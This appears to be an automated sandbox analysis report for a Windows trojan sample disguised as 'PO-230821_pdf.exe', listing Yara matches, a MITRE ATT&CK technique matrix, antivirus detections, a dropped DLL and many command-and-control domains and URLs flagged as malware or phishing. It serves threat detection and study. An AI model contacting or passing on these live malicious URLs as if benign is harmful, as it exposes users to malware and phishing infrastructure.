Source: Yara match	File source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected NSISDropper

Source: Yara match

File source: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Rootkit	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	512 Process Injection	2 Virtualization/Sandbox Evasion	LSASS Memory	251 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	512 Process Injection	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	115 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO-230821_pdf.exe	68%	ReversingLabs	Win32.Trojan.Nemesis
PO-230821_pdf.exe	42%	Virustotal		Browse
PO-230821_pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll	67%	ReversingLabs	Win32.Trojan.LokiBot

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.ownlegalhelp.com	4%	Virustotal	Browse
td-ccm-neg-87-45.wixdns.net	0%	Virustotal	Browse
www.bmmboo.com	4%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.ahevrlh.xyz	0%	Avira URL Cloud	safe
http://www.1wapws.topReferer:	0%	Avira URL Cloud	safe
http://www.ahevrlh.xyzReferer:	0%	Avira URL Cloud	safe
http://www.ymjblnvo.cfd/sn26/lJ	100%	Avira URL Cloud	malware
http://www.kentuckywalkabout.com/sn26/www.qcdrxwr.cfd	100%	Avira URL Cloud	malware
http://www.uahrbqtj.cfd/sn26/?kJBLpb8=ueTspPcvStQ4P/B/BGMviMSUI7+26iAWBkDAplOqW0XstMbPZQlOryCbf8ldO6To/Dtn&ML0tl=NZlpi	100%	Avira URL Cloud	malware
http://www.974dp.comReferer:	0%	Avira URL Cloud	safe
http://www.zachmahl.com/sn26/www.uahrbqtj.cfd	100%	Avira URL Cloud	malware
http://www.wdlzzfkc.cfd	0%	Avira URL Cloud	safe
http://www.4tbbwa.com/sn26/	100%	Avira URL Cloud	malware
http://www.thirdmind.networkReferer:	0%	Avira URL Cloud	safe
http://www.974dp.com/sn26/	100%	Avira URL Cloud	malware
www.zachmahl.com/sn26/	100%	Avira URL Cloud	malware
http://www.thewhiteorchidspa.com/sn26/	100%	Avira URL Cloud	malware
http://www.bmmboo.com/sn26/	100%	Avira URL Cloud	malware
https://powerpoint.office.comcember	0%	Avira URL Cloud	safe
http://www.uedam.xyz/sn26/	100%	Avira URL Cloud	phishing
http://www.kentuckywalkabout.comReferer:	0%	Avira URL Cloud	safe
http://www.ahevrlh.xyz/sn26/?kJBLpb8=K4V3qd++KPCvHN0rtQuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUiVxqdSsVX/P&ML0tl=NZlpi	100%	Avira URL Cloud	phishing
http://www.974dp.com	100%	Avira URL Cloud	malware
http://www.kentuckywalkabout.com	100%	Avira URL Cloud	phishing
http://www.974dp.com/sn26/www.bmmboo.com	100%	Avira URL Cloud	malware
http://www.ownlegalhelp.com/sn26/	100%	Avira URL Cloud	malware
http://www.thewhiteorchidspa.com/sn26/www.zachmahl.com	100%	Avira URL Cloud	malware
http://www.canada-reservation.com	100%	Avira URL Cloud	phishing
http://www.qcdrxwr.cfd/sn26/www.uedam.xyz	100%	Avira URL Cloud	phishing
http://www.thirdmind.network/sn26/www.thewhiteorchidspa.com	100%	Avira URL Cloud	malware
http://www.wdlzzfkc.cfdReferer:	0%	Avira URL Cloud	safe
http://www.bmmboo.com/sn26/www.ownlegalhelp.com	100%	Avira URL Cloud	malware
http://www.ymjblnvo.cfdReferer:	0%	Avira URL Cloud	safe
http://www.uahrbqtj.cfd	100%	Avira URL Cloud	malware
http://www.ymjblnvo.cfd/sn26/	100%	Avira URL Cloud	malware
http://www.zachmahl.comReferer:	0%	Avira URL Cloud	safe
http://www.bmmboo.com	100%	Avira URL Cloud	malware
http://www.wdlzzfkc.cfd/sn26/www.canada-reservation.com	100%	Avira URL Cloud	malware
http://www.thirdmind.network/sn26/?kJBLpb8=JTmN6zoWWGNjq6ib/pFFv2cag4i5j1OLo1K7cxhy0Qg9CF/c4lTnOzzR4r51HW/WUnmz&ML0tl=NZlpi	100%	Avira URL Cloud	malware
http://www.zachmahl.com/sn26/	100%	Avira URL Cloud	malware
http://www.ownlegalhelp.com	100%	Avira URL Cloud	malware
http://www.thirdmind.network/sn26/	100%	Avira URL Cloud	malware
http://www.thewhiteorchidspa.comReferer:	0%	Avira URL Cloud	safe
http://www.thewhiteorchidspa.com	100%	Avira URL Cloud	malware
http://www.4tbbwa.comReferer:	0%	Avira URL Cloud	safe
http://www.uahrbqtj.cfd/sn26/	100%	Avira URL Cloud	malware
http://www.ymjblnvo.cfd	100%	Avira URL Cloud	malware
http://www.thirdmind.network	100%	Avira URL Cloud	malware
http://www.4tbbwa.com/sn26/?kJBLpb8=CpYCJqaIXUbm3IVdfGXcfWVbwpqiZyf/2rRsJh0RGmHsf115fz67BvVx/+oGOa6+KG1D&ML0tl=NZlpi	100%	Avira URL Cloud	malware
http://www.uedam.xyz	100%	Avira URL Cloud	malware
http://www.ahevrlh.xyz/sn26/www.thirdmind.network	100%	Avira URL Cloud	phishing
http://www.ownlegalhelp.com/sn26/www.4tbbwa.com	100%	Avira URL Cloud	malware
http://www.4tbbwa.com/sn26/www.ahevrlh.xyz	100%	Avira URL Cloud	malware
http://www.4tbbwa.com	100%	Avira URL Cloud	malware
http://www.qcdrxwr.cfd/sn26/	100%	Avira URL Cloud	phishing
http://www.bmmboo.comReferer:	0%	Avira URL Cloud	safe
http://www.qcdrxwr.cfd	100%	Avira URL Cloud	phishing
http://www.canada-reservation.comReferer:	0%	Avira URL Cloud	safe
http://www.uahrbqtj.cfd/sn26/www.wdlzzfkc.cfd	100%	Avira URL Cloud	malware
http://www.uahrbqtj.cfdReferer:	0%	Avira URL Cloud	safe
http://www.canada-reservation.com/sn26/www.kentuckywalkabout.com	100%	Avira URL Cloud	malware
http://www.ownlegalhelp.com/sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi	100%	Avira URL Cloud	malware
http://www.wdlzzfkc.cfd/sn26/	100%	Avira URL Cloud	malware
http://www.1wapws.top/sn26/www.ymjblnvo.cfd	100%	Avira URL Cloud	phishing
http://www.canada-reservation.com/sn26/	100%	Avira URL Cloud	malware
http://www.bmmboo.com/sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi	100%	Avira URL Cloud	malware
http://www.ahevrlh.xyz/sn26/	100%	Avira URL Cloud	phishing
http://www.uedam.xyzReferer:	0%	Avira URL Cloud	safe
http://www.kentuckywalkabout.com/sn26/	100%	Avira URL Cloud	malware
http://www.uedam.xyz/sn26/www.1wapws.top	100%	Avira URL Cloud	phishing
http://www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi	100%	Avira URL Cloud	malware
http://www.qcdrxwr.cfdReferer:	0%	Avira URL Cloud	safe
http://www.1wapws.top	100%	Avira URL Cloud	malware
http://www.1wapws.top/sn26/	100%	Avira URL Cloud	phishing
http://www.zachmahl.com	0%	Avira URL Cloud	safe
http://www.ownlegalhelp.comReferer:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
webredir.vip.gandi.net	217.70.184.50	true	false		high
www.ownlegalhelp.com	35.233.138.132	true	false	4%, Virustotal, Browse	unknown
www.bmmboo.com	66.96.162.129	true	true	4%, Virustotal, Browse	unknown
td-ccm-neg-87-45.wixdns.net	34.149.87.45	true	true	0%, Virustotal, Browse	unknown
4tbbwa.com	34.102.136.180	true	false		unknown
www.uahrbqtj.cfd	107.148.25.122	true	true		unknown
happy.zgag-zxxgagugue.com	1.1.1.1	true	true		unknown
www.ahevrlh.xyz	188.114.97.7	true	true		unknown
www.4tbbwa.com	unknown	unknown	true		unknown
www.974dp.com	unknown	unknown	true		unknown
www.thewhiteorchidspa.com	unknown	unknown	true		unknown
www.thirdmind.network	unknown	unknown	true		unknown
www.zachmahl.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.uahrbqtj.cfd/sn26/?kJBLpb8=ueTspPcvStQ4P/B/BGMviMSUI7+26iAWBkDAplOqW0XstMbPZQlOryCbf8ldO6To/Dtn&ML0tl=NZlpi	true	Avira URL Cloud: malware	unknown
www.zachmahl.com/sn26/	true	Avira URL Cloud: malware	low
http://www.ahevrlh.xyz/sn26/?kJBLpb8=K4V3qd++KPCvHN0rtQuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUiVxqdSsVX/P&ML0tl=NZlpi	true	Avira URL Cloud: phishing	unknown
http://www.thirdmind.network/sn26/?kJBLpb8=JTmN6zoWWGNjq6ib/pFFv2cag4i5j1OLo1K7cxhy0Qg9CF/c4lTnOzzR4r51HW/WUnmz&ML0tl=NZlpi	true	Avira URL Cloud: malware	unknown
http://www.4tbbwa.com/sn26/?kJBLpb8=CpYCJqaIXUbm3IVdfGXcfWVbwpqiZyf/2rRsJh0RGmHsf115fz67BvVx/+oGOa6+KG1D&ML0tl=NZlpi	false	Avira URL Cloud: malware	unknown
http://www.ownlegalhelp.com/sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi	false	Avira URL Cloud: malware	unknown
http://www.bmmboo.com/sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi	true	Avira URL Cloud: malware	unknown
http://www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.thewhiteorchidspa.com/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.4tbbwa.com/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.ahevrlh.xyz	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ahevrlh.xyzReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kentuckywalkabout.com/sn26/www.qcdrxwr.cfd	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.1wapws.topReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bmmboo.com/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.uedam.xyz/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.ymjblnvo.cfd/sn26/lJ	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://powerpoint.office.comcember	explorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.974dp.comReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zachmahl.com/sn26/www.uahrbqtj.cfd	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://excel.office.com	explorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.974dp.com/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.wdlzzfkc.cfd	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thirdmind.networkReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kentuckywalkabout.comReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.974dp.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.974dp.com/sn26/www.bmmboo.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.thewhiteorchidspa.com/sn26/www.zachmahl.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.canada-reservation.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.ownlegalhelp.com/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.qcdrxwr.cfd/sn26/www.uedam.xyz	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.kentuckywalkabout.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.wdlzzfkc.cfdReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thirdmind.network/sn26/www.thewhiteorchidspa.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.bmmboo.com/sn26/www.ownlegalhelp.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ymjblnvo.cfd/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.zachmahl.comReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ymjblnvo.cfdReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uahrbqtj.cfd	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.wdlzzfkc.cfd/sn26/www.canada-reservation.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.zachmahl.com/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://word.office.com	explorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.bmmboo.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ownlegalhelp.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.thirdmind.network/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.thewhiteorchidspa.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.thewhiteorchidspa.comReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.4tbbwa.comReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ymjblnvo.cfd	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.uahrbqtj.cfd/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.uedam.xyz	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.thirdmind.network	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ahevrlh.xyz/sn26/www.thirdmind.network	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.ownlegalhelp.com/sn26/www.4tbbwa.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.gandi.net/en/domain	explorer.exe, 00000003.00000002.3618557248.000000001104F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.3586242092.000000000542F000.00000004.10000000.00040000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	PO-230821_pdf.exe	false		high
http://www.4tbbwa.com/sn26/www.ahevrlh.xyz	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://outlook.com	explorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.qcdrxwr.cfd	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.4tbbwa.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.qcdrxwr.cfd/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.uahrbqtj.cfd/sn26/www.wdlzzfkc.cfd	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.bmmboo.comReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.canada-reservation.comReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.canada-reservation.com/sn26/www.kentuckywalkabout.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.1wapws.top/sn26/www.ymjblnvo.cfd	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.wdlzzfkc.cfd/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://whois.gandi.net/en/results?search=thirdmind.network	explorer.exe, 00000003.00000002.3618557248.000000001104F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.3586242092.000000000542F000.00000004.10000000.00040000.00000000.sdmp	false		high
